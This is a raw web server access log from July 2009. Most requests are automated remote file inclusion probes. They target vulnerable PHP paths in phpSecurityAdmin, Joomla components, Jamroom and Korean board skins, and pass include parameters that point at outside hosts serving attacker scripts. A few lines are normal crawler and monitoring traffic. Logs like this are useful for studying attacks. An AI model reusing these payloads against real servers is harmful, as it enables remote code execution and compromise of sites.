87.20.186.139 - - [26/Jul/2009:06:33:32 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:33:32 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:33:33 -0400] "GET /logs/access_log.Q109060500//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.6.22.169 - - [26/Jul/2009:06:33:46 -0400] "GET /logs/error_log.Q107100800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.68.247 - - [26/Jul/2009:06:33:54 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1129314E9F044900FFA200P+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.20.186.139 - - [26/Jul/2009:06:34:01 -0400] "GET //?path%5Bdocroot%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:34:01 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 200 11071 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:34:01 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:34:03 -0400] "GET /logs/access_log.Q109053100%20%20//?path%5Bdocroot%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
210.109.101.217 - - [26/Jul/2009:06:34:30 -0400] "GET /logs/access_log.Q109051600%20%20//aedatingCMS.php?dir[inc]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
220.231.126.252 - - [26/Jul/2009:06:34:30 -0400] "GET /logs/access_log.Q109060100%20%20///zb41/include/write.php?dir=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
195.239.48.166 - - [26/Jul/2009:06:35:01 -0400] "GET /logs/error_log.Q109071100////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
210.109.101.217 - - [26/Jul/2009:06:36:42 -0400] "GET /logs/access_log.Q109051600%20%20//aedatingCMS.php?dir[inc]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:06:37:16 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:06:37:16 -0400] "GET /logs/access_log.Q109061200//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:06:37:16 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:37:46 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:37:47 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
219.94.148.39 - - [26/Jul/2009:06:38:23 -0400] "GET //index.php?DOCUMENT_ROOT=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
219.94.148.39 - - [26/Jul/2009:06:38:23 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.94.148.39 - - [26/Jul/2009:06:38:23 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
219.94.148.39 - - [26/Jul/2009:06:38:28 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:39:21 -0400] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:39:21 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:39:21 -0400] "GET /logs/access_log.Q109052100/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
65.182.186.172 - - [26/Jul/2009:06:39:27 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://109.cypanel.com/bbs/icon/icon.gif??? HTTP/1.1" 404 262 "-" "libwww-perl/5.812"
65.182.186.172 - - [26/Jul/2009:06:39:27 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://109.cypanel.com/bbs/icon/icon.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.812"
65.182.186.172 - - [26/Jul/2009:06:39:27 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://109.cypanel.com/bbs/icon/icon.gif??? HTTP/1.1" 404 240 "-" "libwww-perl/5.812"
66.249.68.247 - - [26/Jul/2009:06:39:40 -0400] "GET /images/_notes/nav_store_search_off_r1_c4.jpg.mno HTTP/1.1" 200 210 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.110.19.24 - - [26/Jul/2009:06:39:46 -0400] "GET /logs/access_log.Q109062300%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:06:40:25 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:06:40:25 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:06:40:25 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
124.0.146.100 - - [26/Jul/2009:06:40:36 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
124.0.146.100 - - [26/Jul/2009:06:40:36 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.146.100 - - [26/Jul/2009:06:40:36 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:06:40:52 -0400] "GET /logs/access_log.Q109060500%20%20///plugins/payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:06:40:59 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:06:40:59 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:06:40:59 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:06:41:04 -0400] "GET /logs/access_log.Q109071200%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:06:41:05 -0400] "GET /logs/access_log.Q109060600%20%20/e404.php?DOCUMENT_ROOT=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:41:07 -0400] "GET /logs/access_log.Q109061100/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:06:41:13 -0400] "GET /logs/error_log.Q109060500%20%20///plugins/payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:06:41:16 -0400] "GET /logs/access_log.Q109050800%20%20/e404.php?DOCUMENT_ROOT=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.146.100 - - [26/Jul/2009:06:41:17 -0400] "GET /logs/access_log.Q109071200%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
65.182.186.172 - - [26/Jul/2009:06:41:39 -0400] "GET /logs/access_log.Q109071200//bbs//skin/ggambo7002_board/write.php?dir=http://109.cypanel.com/bbs/icon/icon.gif??? HTTP/1.1" 404 262 "-" "libwww-perl/5.812"
115.88.240.91 - - [26/Jul/2009:06:41:43 -0400] "GET /logs/access_log.Q109071200%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
61.109.250.29 - - [26/Jul/2009:06:42:22 -0400] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
61.109.250.29 - - [26/Jul/2009:06:42:22 -0400] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 200 11072 "-" "Mozilla/5.0"
61.109.250.29 - - [26/Jul/2009:06:42:24 -0400] "GET /logs/access_log.Q109050800///?_SERVER%5BDOCUMENT_ROOT%5D=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:06:43:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
219.94.148.39 - - [26/Jul/2009:06:43:32 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
219.94.148.39 - - [26/Jul/2009:06:43:37 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.146.100 - - [26/Jul/2009:06:44:36 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.249.68.79 - - [26/Jul/2009:06:44:41 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1129314E9F341900F3A200P+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.247 - - [26/Jul/2009:06:46:16 -0400] "GET /images/_notes/store_anim_r2_c1_f4.gif.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.213.63.137 - - [26/Jul/2009:06:46:53 -0400] "GET /logs///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
123.213.63.137 - - [26/Jul/2009:06:46:53 -0400] "GET /logs/access_log.Q109071500%20%20///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
123.213.63.137 - - [26/Jul/2009:06:46:53 -0400] "GET ///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
121.130.29.11 - - [26/Jul/2009:06:47:04 -0400] "GET ///skin/ggambo7002_board/write.php?dir=http://www.hisarkitabevi.com/components/com_virtuemart/idfx1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
121.130.29.11 - - [26/Jul/2009:06:47:04 -0400] "GET /logs///skin/ggambo7002_board/write.php?dir=http://www.hisarkitabevi.com/components/com_virtuemart/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.130.29.11 - - [26/Jul/2009:06:47:04 -0400] "GET /logs/access_log.Q109071500%20%20///skin/ggambo7002_board/write.php?dir=http://www.hisarkitabevi.com/components/com_virtuemart/idfx1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.189.119.171 - - [26/Jul/2009:06:47:23 -0400] "GET /logs/access_log.Q109071500///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.189.119.171 - - [26/Jul/2009:06:47:23 -0400] "GET ///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.189.119.171 - - [26/Jul/2009:06:47:23 -0400] "GET /logs///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
123.213.63.137 - - [26/Jul/2009:06:47:32 -0400] "GET /logs/access_log.Q109071500///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
123.213.63.137 - - [26/Jul/2009:06:47:32 -0400] "GET /logs///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
123.213.63.137 - - [26/Jul/2009:06:47:32 -0400] "GET ///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
123.213.63.137 - - [26/Jul/2009:06:47:45 -0400] "GET /logs/access_log.Q109071500///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
123.213.63.137 - - [26/Jul/2009:06:47:45 -0400] "GET /logs///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
123.213.63.137 - - [26/Jul/2009:06:47:45 -0400] "GET ///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
121.130.29.11 - - [26/Jul/2009:06:47:49 -0400] "GET /logs/access_log.Q109071200%20%20///skin/ggambo7002_board/write.php?dir=http://www.hisarkitabevi.com/components/com_virtuemart/idfx1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
121.130.29.11 - - [26/Jul/2009:06:47:52 -0400] "GET ///skin/ggambo7002_board/write.php?dir=http://www.hisarkitabevi.com/components/com_virtuemart/idfx1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
121.130.29.11 - - [26/Jul/2009:06:47:52 -0400] "GET /logs///skin/ggambo7002_board/write.php?dir=http://www.hisarkitabevi.com/components/com_virtuemart/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.130.29.11 - - [26/Jul/2009:06:47:52 -0400] "GET /logs/access_log.Q109071500///skin/ggambo7002_board/write.php?dir=http://www.hisarkitabevi.com/components/com_virtuemart/idfx1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.189.119.171 - - [26/Jul/2009:06:47:54 -0400] "GET /logs/access_log.Q109071500///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.189.119.171 - - [26/Jul/2009:06:47:54 -0400] "GET ///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.189.119.171 - - [26/Jul/2009:06:47:54 -0400] "GET /logs///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
123.213.63.137 - - [26/Jul/2009:06:48:00 -0400] "GET /logs/access_log.Q109071200%20%20///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:06:48:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.189.119.171 - - [26/Jul/2009:06:48:15 -0400] "GET /logs/access_log.Q109071200///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:06:48:16 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:06:48:22 -0400] "GET /logs/access_log.Q109071200//bbs//skin/ggambo7002_board/write.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.189.119.171 - - [26/Jul/2009:06:48:24 -0400] "GET ///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.189.119.171 - - [26/Jul/2009:06:48:29 -0400] "GET /logs///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.189.119.171 - - [26/Jul/2009:06:48:29 -0400] "GET /logs/access_log.Q109071500%20%20///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
123.213.63.137 - - [26/Jul/2009:06:48:33 -0400] "GET /logs/access_log.Q109071200///skin/ggambo7002_board/write.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
121.130.29.11 - - [26/Jul/2009:06:48:40 -0400] "GET /logs/access_log.Q109071200///skin/ggambo7002_board/write.php?dir=http://www.hisarkitabevi.com/components/com_virtuemart/idfx1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
74.6.22.169 - - [26/Jul/2009:06:48:46 -0400] "GET /logs/access_log.Q109011400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.20.186.139 - - [26/Jul/2009:06:49:01 -0400] "GET /logs/access_log.Q109052100%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:06:49:04 -0400] "GET /logs/access_log.Q109051400////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
87.106.210.178 - - [26/Jul/2009:06:49:04 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 200 11073 "-" "libwww-perl/5.805"
87.106.210.178 - - [26/Jul/2009:06:49:05 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 200 454 "-" "libwww-perl/5.805"
74.6.22.169 - - [26/Jul/2009:06:49:11 -0400] "GET /logs/error_log.Q108110200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
93.190.41.97 - - [26/Jul/2009:06:49:19 -0400] "GET /logs/access_log.Q109051400////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.823"
93.190.41.97 - - [26/Jul/2009:06:49:19 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 200 454 "-" "libwww-perl/5.823"
93.190.41.97 - - [26/Jul/2009:06:49:19 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 200 11073 "-" "libwww-perl/5.823"
93.190.41.97 - - [26/Jul/2009:06:49:25 -0400] "GET /logs/access_log.Q109061600////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.823"
219.94.148.39 - - [26/Jul/2009:06:51:12 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
219.94.148.39 - - [26/Jul/2009:06:51:12 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.94.148.39 - - [26/Jul/2009:06:51:12 -0400] "GET /logs/access_log.Q109051200//skin/zero_vote/ask_password.php?dir=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
219.94.148.39 - - [26/Jul/2009:06:51:17 -0400] "GET /logs/access_log.Q109051500//skin/zero_vote/ask_password.php?dir=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
219.94.148.39 - - [26/Jul/2009:06:51:29 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
219.94.148.39 - - [26/Jul/2009:06:51:29 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.94.148.39 - - [26/Jul/2009:06:51:29 -0400] "GET /logs/access_log.Q109051200%20%20//skin/zero_vote/ask_password.php?dir=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
219.94.148.39 - - [26/Jul/2009:06:51:37 -0400] "GET /logs/access_log.Q109051500%20%20//skin/zero_vote/ask_password.php?dir=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
68.44.229.217 - - [26/Jul/2009:06:51:51 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 3.5.21022; InfoPath.2)"
68.44.229.217 - - [26/Jul/2009:06:51:51 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 3.5.21022; InfoPath.2)"
195.239.48.166 - - [26/Jul/2009:06:51:51 -0400] "GET /logs/access_log.Q109051400////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
68.44.229.217 - - [26/Jul/2009:06:51:52 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 3.5.21022; InfoPath.2)"
68.44.229.217 - - [26/Jul/2009:06:51:52 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 3.5.21022; InfoPath.2)"
87.20.186.139 - - [26/Jul/2009:06:52:32 -0400] "GET /logs/access_log.Q109061100%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:06:52:50 -0400] "GET /images/_notes/nav_store_fav_over_r1_c3.jpg.mno HTTP/1.1" 200 210 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [26/Jul/2009:06:53:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.20.186.139 - - [26/Jul/2009:06:53:49 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:53:49 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:53:49 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:53:55 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
219.94.148.39 - - [26/Jul/2009:06:54:53 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.94.148.39 - - [26/Jul/2009:06:54:53 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
219.94.148.39 - - [26/Jul/2009:06:54:53 -0400] "GET /logs/access_log.Q109051200//skin/zero_vote/ask_password.php?dir=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
219.94.148.39 - - [26/Jul/2009:06:55:00 -0400] "GET /logs/access_log.Q109051500//skin/zero_vote/ask_password.php?dir=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
